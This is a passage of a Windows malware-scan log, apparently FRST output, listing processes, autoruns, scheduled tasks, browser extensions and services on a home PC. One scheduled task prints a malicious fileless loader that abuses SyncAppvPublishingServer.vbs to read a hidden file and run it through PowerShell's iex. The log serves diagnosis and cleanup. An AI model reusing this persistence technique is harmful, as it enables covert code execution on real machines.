(Discord Inc. -> Discord Inc.) C:UsersPhenomAppDataLocalDiscordCanaryapp-1.0.46DiscordCanary.exe <6>
(Epic Games Inc. -> Epic Games, Inc.) C:Program Files (x86)Epic GamesLauncherPortalBinariesWin64EpicGamesLauncher.exe
(explorer.exe ->) (Blizzard Entertainment, Inc. -> Blizzard Entertainment) C:Program Files (x86)Battle.netBattle.net.exe <3>
(explorer.exe ->) (Ghisler Software GmbH -> Ghisler Software GmbH) C:Program FilesTotal CommanderTOTALCMD64.EXE
(explorer.exe ->) (Google LLC -> Google LLC) C:Program FilesGoogleChrome BetaApplicationchrome.exe <57>
(Google LLC -> Google LLC) C:Program Files (x86)GoogleUpdate1.3.36.132GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:Program Files (x86)GoogleUpdate1.3.36.132GoogleCrashHandler64.exe
(HP Inc.) C:Program FilesWindowsAppsAD2F1837.OMENCommandCenter_1101.2203.4.0_x64__v10z8vjag6ke6win32OmenCommandCenterBackground.exe
(Microsoft Windows -> Microsoft Corporation) C:Program FilesWindows NTAccessorieswordpad.exe
(Microsoft Windows -> Microsoft Corporation) C:WindowsSystem32Taskmgr.exe
(Microsoft Windows -> Microsoft Corporation) C:WindowsSystem32WindowsPowerShellv1.0powershell.exe
(Nvidia Corporation -> Node.js) C:Program Files (x86)NVIDIA CorporationNvNodeNVIDIA Web Helper.exe
(Piriform Software Ltd -> Piriform Software Ltd) C:Program FilesCCleanerCCleaner64.exe
(services.exe ->) (ADLICE -> ) C:Program FilesRogueKillerRogueKillerSvc.exe
(services.exe ->) (Avira Operations GmbH & Co. KG) [File not signed] C:Program Files (x86)AviraVPNAvira.VpnService.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefender AgentProductAgentService.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefender Agentredlinebdredline.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe <3>
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender Securityupdatesrv.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender VPNBdVpnService.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesCommon FilesBitdefenderSetupInformationBitdefender RedLinebdredline.exe
(services.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureFreedomeFreedome1.1fsvpnservice.exe
(services.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureSAFEfshoster32.exe <3>
(services.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fshoster64.exe <2>
(services.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fsorsp64.exe
(services.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fsulprothoster.exe
(services.exe ->) (Malwarebytes Inc -> Malwarebytes) C:Program FilesMalwarebytesAnti-MalwareMBAMService.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:Program FilesCommon Filesmicrosoft sharedClickToRunOfficeClickToRun.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:WindowsSystem32DriverStoreFileRepositorynv_dispi.inf_amd64_4d7400884d0d52e3Display.NvContainerNVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:WindowsSystem32DriverStoreFileRepositoryrealtekservice.inf_amd64_eb52bf0d4dccfcf3RtkAudUService64.exe <2>
(services.exe ->) (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) C:Program Files (x86)SamsungSamsung MagicianSamsungMagicianSVC.exe
(Slack Technologies, Inc. -> Slack Technologies Inc.) C:UsersPhenomAppDataLocalslackapp-4.26.0slack.exe <5>
(svchost.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGABYTE Technology Co.,Ltd.) C:Program Files (x86)GIGABYTEAORUS ENGINEAORUS.exe
(svchost.exe ->) (HP Inc. -> HP Inc.) C:Program FilesHPSystemOptimizerSystemOptimizer.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:WindowsImmersiveControlPanelSystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:WindowsSystem32dllhost.exe <3>
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:WindowsUUSamd64MoUsoCoreWorker.exe
(svchost.exe ->) (Microsoft Windows) C:Program FilesWindowsAppsMicrosoftWindows.Client.WebExperience_421.20070.95.0_x64__cw5n1h2txyewyDashboardWidgets.exe
(svchost.exe ->) (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) C:Program Files (x86)SamsungSamsung MagicianSamsungMagician.exe <4>
(svchost.exe ->) (WhatsApp Inc.) C:Program FilesWindowsApps5319275A.51895FA4EA97F_2.2216.4.0_x64__cv1g1gvanyjgmWhatsApp.exe
(Telegram Messenger LLP) C:Program FilesWindowsAppsTelegramMessengerLLP.TelegramDesktop_3.6.0.0_x64__t4vj0pshhgkwmTelegram.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM...Run: [RtkAudUService] => C:WINDOWSSystem32DriverStoreFileRepositoryrealtekservice.inf_amd64_eb52bf0d4dccfcf3RtkAudUService64.exe [3479488 2022-04-11] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKUS-1-5-21-1599435516-3482468045-2126034812-1001...Run: [EpicGamesLauncher] => C:Program Files (x86)Epic GamesLauncherPortalBinariesWin64EpicGamesLauncher.exe [32613856 2022-04-28] (Epic Games Inc. -> Epic Games, Inc.)
HKUS-1-5-21-1599435516-3482468045-2126034812-1001...Run: [CCleaner Smart Cleaning] => C:Program FilesCCleanerCCleaner64.exe [36705520 2022-04-07] (Piriform Software Ltd -> Piriform Software Ltd)
HKUS-1-5-21-1599435516-3482468045-2126034812-1001...Run: [DiscordCanary] => C:UsersPhenomAppDataLocalDiscordCanaryUpdate.exe [1522176 2022-04-15] (Discord Inc. -> GitHub)
HKUS-1-5-21-1599435516-3482468045-2126034812-1001...Run: [Battle.net] => C:Program Files (x86)Battle.netBattle.net.exe [1088456 2022-04-27] (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
HKUS-1-5-21-1599435516-3482468045-2126034812-1001...Run: [com.squirrel.slack.slack] => C:UsersPhenomAppDataLocalslackslack.exe [309056 2022-04-28] (Slack Technologies, Inc. -> Slack Technologies Inc.)
HKLMSoftwareMicrosoftActive SetupInstalled Components: [{8237E44A-0054-442C-B6B6-EA0509993955}] -> C:Program FilesGoogleChrome BetaApplication101.0.4951.41Installerchrmstp.exe [2022-04-20] (Google LLC -> Google LLC)
HKLMSoftwareMicrosoftActive SetupInstalled Components: [{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}] -> C:Program FilesBraveSoftwareBrave-BrowserApplication101.1.38.109Installerchrmstp.exe [2022-04-27] (Brave Software, Inc. -> Brave Software, Inc.)
Startup: C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupAORUS ENGINE.lnk [2022-04-15]
ShortcutTarget: AORUS ENGINE.lnk -> C:Program Files (x86)GIGABYTEAORUS ENGINEautorun.exe () [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:ProgramDataNTUSER.pol: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {02121D01-DBE4-4731-9DFF-FB8E80386CF1} - System32TasksBraveSoftwareUpdateTaskMachineCore => C:Program Files (x86)BraveSoftwareUpdateBraveUpdate.exe [165120 2022-04-11] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {02D88619-C1AF-4364-BD46-DB97F47F0577} - System32TasksF-SecureF-Secure Hotfix => C:Program Files (x86)F-SecureSAFEfs_hotfix.exe [315032 2022-03-25] (F-Secure Corporation -> F-Secure Corporation)
Task: {0489B081-0CCD-44EB-AF65-ECB241F60E93} - System32TasksGoogleUpdateTaskMachineUA => C:Program Files (x86)GoogleUpdateGoogleUpdate.exe [156232 2022-01-19] (Google LLC -> Google LLC)
Task: {144401BC-4F00-4243-ADDC-23C0991D77EB} - System32TasksNvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe [1003128 2022-03-01] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:Program FilesNVIDIA CorporationNvDriverUpdateCheck" -l 3 -f C:ProgramDataNVIDIANvContainerDriverUpdateCheck.log
Task: {18FA359C-512D-4264-BBC4-9716B96EBB68} - System32TasksGoogleUpdateTaskMachineCore => C:Program Files (x86)GoogleUpdateGoogleUpdate.exe [156232 2022-01-19] (Google LLC -> Google LLC)
Task: {1E9485AB-1FC8-4BF5-BD10-22D73C225910} - System32TasksNVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNVIDIA GeForce ExperienceNVIDIA GeForce Experience.exe [3342080 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {316E7299-D946-42B5-B73D-B3CE78777AB9} - System32TasksMicrosoftOfficeOffice Automatic Updates 2.0 => C:Program FilesCommon FilesMicrosoft SharedClickToRunOfficeC2RClient.exe [21863344 2022-02-24] (Microsoft Corporation -> Microsoft Corporation)
Task: {33F7899E-577F-41F4-B864-D0141C9D8AB2} - System32TasksNvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationUpdate CoreNvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {42212260-AAC6-4D5C-837A-A35AAF48EEAC} - System32TasksOneDrive Standalone Update Task-S-1-5-21-1599435516-3482468045-2126034812-1002 => C:UsersPhenomAppDataLocalMicrosoftOneDriveOneDriveStandaloneUpdater.exe (No File)
Task: {4F483515-29B7-41B1-BF87-A0721EE17B31} - System32TasksBraveSoftwareUpdateTaskMachineUA => C:Program Files (x86)BraveSoftwareUpdateBraveUpdate.exe [165120 2022-04-11] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {571D52C1-5426-462D-832E-CAE81C4BD13F} - System32TasksMicrosoftWindowsWHServiceProviderAccess => C:WindowsSystem32SyncAppvPublishingServer.vbs [1720 2021-06-05] (Microsoft Windows -> ) -> "n; $a = Get-Content "C:Windowsrundll62" | Select -Index 17033;iex $a;hackbacktrack 5+SxcONPw31YD5KkNSFEldTrLB+ZFx7b29V1rxazM+g=
Task: {5C6840F8-D23B-420B-BB78-9E7C6677F63D} - System32TasksMicrosoftOfficeOfficeTelemetryAgentFallBack2016 => C:Program FilesMicrosoft OfficerootOffice16msoia.exe [7053720 2022-04-11] (Microsoft Corporation -> Microsoft Corporation)
Task: {5EF50543-85B4-4C16-B500-2BE109B09A59} - System32TasksNvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvBackendNvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {5FD84DD5-34F7-4C4E-8C31-8AA688608220} - System32TasksMicrosoftOfficeOffice Feature Updates Logon => C:Program FilesMicrosoft OfficerootOffice16sdxhelper.exe [141208 2022-04-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {657CCEF6-B925-4BB8-8BC5-4BD98753C3D3} - System32TasksMicrosoftOfficeOfficeTelemetryAgentLogOn2016 => C:Program FilesMicrosoft OfficerootOffice16msoia.exe [7053720 2022-04-11] (Microsoft Corporation -> Microsoft Corporation)
Task: {7E0D34DA-C99B-4ED8-AD65-78C683E4E6F4} - System32TasksMicrosoftOfficeOffice ClickToRun Service Monitor => C:Program FilesCommon FilesMicrosoft SharedClickToRunOfficeC2RClient.exe [21863344 2022-02-24] (Microsoft Corporation -> Microsoft Corporation)
Task: {806500B0-429A-44D7-B112-B896FB0DF002} - System32TasksNvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvBackendNvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {876E2C86-4C1A-4362-807C-D8A9093BA089} - System32TasksSamsungMagician => C:Program Files (x86)SamsungSamsung MagicianSamsungMagician.exe [109697976 2021-12-09] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
Task: {8EE53488-CE10-4468-BF82-04DD04A80832} - System32TasksSystemOptimizer => C:Program FilesHPSystemOptimizerSystemOptimizer.exe [112728 2022-02-03] (HP Inc. -> HP Inc.)
Task: {971D583E-B335-4C31-8215-203FD48CCF28} - System32TasksNvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvBackendNvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {9B890657-6594-4E7A-8A56-1764675F9614} - System32TasksNvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program Files (x86)NVIDIA CorporationNvNodenvnodejslauncher.exe [646344 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {9C800561-F322-402A-9F8A-D24092BE4DC6} - System32TasksOpera scheduled Autoupdate 1642631694 => C:UsersPhenomAppDataLocalProgramsOpera developerlauncher.exe [2719488 2022-04-25] (Opera Software AS -> Opera Software) <==== ATTENTION
Task: {A8AACED6-3881-4225-B3A7-C59CC48C1B8D} - System32TasksCreateExplorerShellUnelevatedTask => C:Windowsexplorer.exe /NoUACCheck
Task: {AD351213-BD13-4623-8D52-334B6653287E} - System32TasksNvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationUpdate CoreNvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {AF0A8389-6BE8-48E7-B5A6-2264F05C791D} - System32TasksNvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:Program FilesNVIDIA CorporationNvBackendNvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {B1C0202D-0735-40AA-BA43-65446D23A0E5} - System32TasksKpRm-quarantinesKpRm-quarantines-20220428182110 => C:KPRMtasks-quarantineskprm-quarantines.exe [2811112 2022-04-28] (kernel-panik -> kernel-panik) [File not signed]
Task: {B6CD9DD5-733E-4913-B41E-BE05EB7EE694} - System32TasksBitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:Program FilesBitdefenderBitdefender Securitybdagent.exe [584280 2022-04-20] (Bitdefender SRL -> Bitdefender)
Task: {C0CEC1B1-3690-481F-8A9B-493D4E0799D6} - System32TasksOneDrive Standalone Update Task-S-1-5-21-1599435516-3482468045-2126034812-1001 => C:UsersPhenomAppDataLocalMicrosoftOneDriveOneDriveStandaloneUpdater.exe (No File)
Task: {C357FFB5-D09A-4A71-9F1C-DD2F0CD24A14} - System32TasksCCleaner Update => C:Program FilesCCleanerCCUpdate.exe (No File)
Task: {D895215F-D917-49D6-9612-8342A713BEE4} - System32TasksLauncher GIGABYTE AORUS GRAPHICS ENGINE => C:Program Files (x86)GIGABYTEAORUS ENGINEAORUS.exe [34682752 2022-04-06] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGABYTE Technology Co.,Ltd.)
Task: {DEB67D86-1989-4F0D-ACDB-54BBDC527C49} - System32TasksBitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:Program FilesBitdefender Agent26.0.1.220WatchDog.exe [1050728 2022-03-23] (Bitdefender SRL -> Bitdefender)
Task: {E6CDAF43-7A59-4EC1-B8F7-5E627C14235A} - System32TasksOneDrive Reporting Task-S-1-5-21-1599435516-3482468045-2126034812-1002 => C:UsersPhenomAppDataLocalMicrosoftOneDriveOneDriveStandaloneUpdater.exe /reporting (No File)
Task: {F9318572-28D5-44C3-A922-33626CF768E5} - System32TasksMicrosoftOfficeOffice Feature Updates => C:Program FilesMicrosoft OfficerootOffice16sdxhelper.exe [141208 2022-04-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {FCC2E13F-8694-42FB-B00A-7730EEB2751D} - System32TasksCCleanerSkipUAC - Phenom => C:Program FilesCCleanerCCleaner.exe [30836464 2022-04-07] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {FCC85155-47B0-440D-B196-5117B748A8DE} - System32TasksMozillaFirefox Nightly Default Browser Agent 6F193CCC56814779 => C:Program FilesFirefox Nightlydefault-browser-agent.exe do-task "6F193CCC56814779"

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 127.0.0.1 localhost
TcpipParameters: [DhcpNameServer] 192.168.0.1
Tcpip..Interfaces{08f01634-5a0a-4001-b76a-d21b548a3691}: [DhcpNameServer] 192.168.0.1
Tcpip..Interfaces{c9b8105f-65f8-4b25-b26f-34596433fd48}: [DhcpNameServer] 192.168.0.1
Tcpip..Interfaces{cd2d2ece-a2e7-4176-b987-5e8ea18b4918}: [DhcpNameServer] 8.8.8.8
HKLMSOFTWAREPoliciesMicrosoftInternet Explorer: Restriction <==== ATTENTION

Edge:
=======
Edge DefaultProfile: Default
Edge Profile: C:UsersPhenomAppDataLocalMicrosoftEdgeUser DataDefault [2022-04-27]
Edge DownloadDir: Default -> C:UsersPhenomDownloads
Edge Notifications: Default -> hxxps://www.tiktok.com
Edge Session Restore: Default -> is enabled.
Edge Extension: (F.B.(FluffBusting)Purity) - C:UsersPhenomAppDataLocalMicrosoftEdgeUser DataDefaultExtensionsbbadpifemeclpdmgelgehgclmeohdoge [2022-04-27]
Edge Extension: (Switch UserAgents) - C:UsersPhenomAppDataLocalMicrosoftEdgeUser DataDefaultExtensionsipacohcfiahhblhbpdnnmnolcakgooci [2022-01-19]
Edge HKLM...EdgeExtension: [cpikpibllpjmpnchjajlibnmmomnnhnm]
Edge HKLM-x32...EdgeExtension: [cpikpibllpjmpnchjajlibnmmomnnhnm]

FireFox:
========
FF DefaultProfile: mkifesbr.default
FF ProfilePath: C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightly [2022-04-28]
FF Session Restore: MozillaFirefoxProfileskuhj0kmw.default-nightly -> is enabled.
FF Extension: (Facebook Container) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions@contain-facebook.xpi [2021-12-30]
FF Extension: (The Stream Detector) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions@m3u8link.xpi [2021-12-30]
FF Extension: (TunnelBear VPN) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensionsbrowser@tunnelbear.com.xpi [2021-12-30]
FF Extension: (Decentraleyes) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensionsjid1-BoFifL9Vbdl2zQ@jetpack.xpi [2021-12-30]
FF Extension: (Nimbus Screen Capture: Screenshots, Annotate) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensionsnimbusscreencaptureff@everhelper.me.xpi [2021-12-30]
FF Extension: (Rotate and Zoom Image) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensionsrotate-and-zoom-image@mikk.cz.xpi [2021-12-30]
FF Extension: (uBlock Origin) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensionsuBlock0@raymondhill.net.xpi [2021-12-30]
FF Extension: (User-Agent Switcher) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions{75afe46a-7a50-4c6b-b866-c43a1075b071}.xpi [2021-12-30]
FF Extension: (Video Speed Controller) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions{7be2ba16-0f1e-4d93-9ebc-5164397477a9}.xpi [2021-12-30]
FF Extension: (Creează un script nou) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions{aecec67f-0d10-4fa7-b7c7-609a2db280cf}.xpi [2021-12-30]
FF Extension: (Video DownloadHelper) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2021-12-30]
FF Extension: (Buster: Captcha Solver for Humans) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfileskuhj0kmw.default-nightlyExtensions{e58d3966-3d76-4cd9-8552-1582fbc800c1}.xpi [2021-12-30]
FF ProfilePath: C:UsersPhenomAppDataRoamingMozillaFirefoxProfiles8k2igm37.default-release [2022-04-28]
FF ProfilePath: C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.default [2022-04-28]
FF NetworkProxy: MozillaFirefoxProfilesmkifesbr.default -> type", 0
FF Session Restore: MozillaFirefoxProfilesmkifesbr.default -> is enabled.
FF Notifications: MozillaFirefoxProfilesmkifesbr.default -> hxxps://www.facebook.com; hxxps://www.youtube.com; hxxps://www.instagram.com
FF Extension: (Facebook Container) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions@contain-facebook.xpi [2022-04-02]
FF Extension: (The Stream Detector) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions@m3u8link.xpi [2022-04-02]
FF Extension: (TunnelBear VPN) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensionsbrowser@tunnelbear.com.xpi [2021-04-03]
FF Extension: (Chrome Store Foxified) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensionsChrome-Store-Foxified@jetpack.xpi [2018-09-07]
FF Extension: (Nimbus Screen Capture: Screenshots, Annotate) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensionsnimbusscreencaptureff@everhelper.me.xpi [2020-08-28]
FF Extension: (Rotate and Zoom Image) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensionsrotate-and-zoom-image@mikk.cz.xpi [2022-04-02]
FF Extension: (uBlock Origin) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensionsuBlock0@raymondhill.net.xpi [2022-04-06]
FF Extension: (User-Agent Switcher) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions{75afe46a-7a50-4c6b-b866-c43a1075b071}.xpi [2021-07-15]
FF Extension: (Video Speed Controller) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions{7be2ba16-0f1e-4d93-9ebc-5164397477a9}.xpi [2021-04-22]
FF Extension: (Creează un script nou) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions{aecec67f-0d10-4fa7-b7c7-609a2db280cf}.xpi [2021-06-07]
FF Extension: (Video DownloadHelper) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2021-07-08]
FF Extension: (Buster: Captcha Solver for Humans) - C:UsersPhenomAppDataRoamingMozillaFirefoxProfilesmkifesbr.defaultExtensions{e58d3966-3d76-4cd9-8552-1582fbc800c1}.xpi [2021-11-04]
FF HKLM...FirefoxExtensions: [bdwtwe@bitdefender.com] - C:Program FilesBitdefenderBitdefender Securitybdwteff.xpi
FF Extension: (Bitdefender Wallet) - C:Program FilesBitdefenderBitdefender Securitybdwteff.xpi [2022-04-20] [UpdateUrl:hxxps://download.bitdefender.com/windows/desktop/connect/wallet/updates.json ]
FF HKLM...FirefoxExtensions: [bdtbe@bitdefender.com] - C:Program FilesBitdefenderBitdefender Securitybdtbef.xpi
FF Extension: (Bitdefender Anti-tracker) - C:Program FilesBitdefenderBitdefender Securitybdtbef.xpi [2020-09-17] [UpdateUrl:hxxps://download.bitdefender.com/windows/desktop/connect/antitracker/updates.json ]
FF HKLM...ThunderbirdExtensions: [bdThunderbird@bitdefender.com] - C:Program FilesBitdefenderBitdefender Securitybdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:Program FilesBitdefenderBitdefender Securitybdtbext [2022-04-20] [Legacy] [not signed]
FF HKLM-x32...FirefoxExtensions: [bdwtwe@bitdefender.com] - C:Program FilesBitdefenderBitdefender Securitybdwteff.xpi
FF HKLM-x32...FirefoxExtensions: [bdtbe@bitdefender.com] - C:Program FilesBitdefenderBitdefender Securitybdtbef.xpi
FF HKLM-x32...ThunderbirdExtensions: [bdThunderbird@bitdefender.com] - C:Program FilesBitdefenderBitdefender Securitybdtbext
FF Plugin: @java.com/DTPlugin,version=11.321.2 -> C:Program FilesJavajre1.8.0_321bindtpluginnpDeployJava1.dll [2022-02-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.321.2 -> C:Program FilesJavajre1.8.0_321binplugin2npjp2.dll [2022-02-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:Program FilesMicrosoft OfficerootOffice16NPSPWRAP.DLL [2022-04-11] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.16 -> C:Program FilesVideoLANVLCnpvlc.dll [2022-04-20] (VideoLAN) [File not signed]
FF Plugin: @videolan.org/vlc,version=3.0.17.3 -> C:Program FilesVideoLANVLCnpvlc.dll [2022-04-20] (VideoLAN) [File not signed]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:Program FilesMicrosoft OfficerootVFSProgramFilesX86Microsoft OfficeOffice16NPSPWRAP.DLL [2022-04-11] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:UsersPhenomAppDataRoamingmozillapluginsnplightsparkplugin.dll [2022-01-19]
StartMenuInternet: Firefox-6F193CCC56814779 - C:Program FilesFirefox Nightlyfirefox.exe

Chrome:
=======
CHR HKLM...ChromeExtension: [jmjjnhpacphpjmnnlnccpfmhkcloaade]
CHR HKLM-x32...ChromeExtension: [gannpgaobkkhmpomoijebaigcapoeebl]
CHR HKLM-x32...ChromeExtension: [jmjjnhpacphpjmnnlnccpfmhkcloaade]
CHR HKLM-x32...ChromeExtension: [khndhdhbebhaddchcgnalcjlaekbbeof]
StartMenuInternet: Google Chrome Beta - C:Program FilesGoogleChrome BetaApplicationchrome.exe

Opera:
=======
StartMenuInternet: (HKUS-1-5-21-1599435516-3482468045-2126034812-1001) Operadeveloper - "C:UsersPhenomAppDataLocalProgramsOpera developerLauncher.exe"

Brave:
=======
BRA Profile: C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser DataDefault [2022-04-19]
BRA Extension: (Brave Local Data Files Updater) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser Dataafalakplffnnnlkncjhbmahjfjhmlkal [2022-04-13]
BRA Extension: (Brave NTP background images) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser Dataaoojcmojmmcbpfgoecoadbdpnagfchel [2022-04-11]
BRA Extension: (Wallet Data Files Updater) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser DataBraveWallet [2022-04-13]
BRA Extension: (Brave Ad Block Updater (Default)) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser Datacffkpbalmllkdoenhmdmpbkajipdjfam [2022-04-13]
BRA Extension: (Brave SpeedReader Updater) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser Datajicbkmdloagakknpihibphagfckhjdih [2022-04-11]
BRA Extension: (Brave NTP sponsored images) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser Datalpebdnochobhopeiidkonjhkepamihmm [2022-04-13]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:UsersPhenomAppDataLocalBraveSoftwareBrave-BrowserUser Dataoofiananboodjbbmdelgdommihjbkfag [2022-04-13]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AfVpnService; C:Program FilesBitdefenderBitdefender VPNhydra.sdk.windows.service.exe [198256 2021-01-26] (Pango Inc. -> AnchorFree Inc.)
S4 AGSService; C:Program Files (x86)Common FilesAdobeAdobeGCClientAGSService.exe [3103824 2021-02-01] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AviraPhantomVPN; C:Program Files (x86)AviraVPNAvira.VpnService.exe [338432 2022-04-22] (Avira Operations GmbH & Co. KG) [File not signed]
R2 BDAuxSrv; C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe [822240 2022-04-20] (Bitdefender SRL -> Bitdefender)
R2 BDProtSrv; C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe [822240 2022-04-20] (Bitdefender SRL -> Bitdefender)
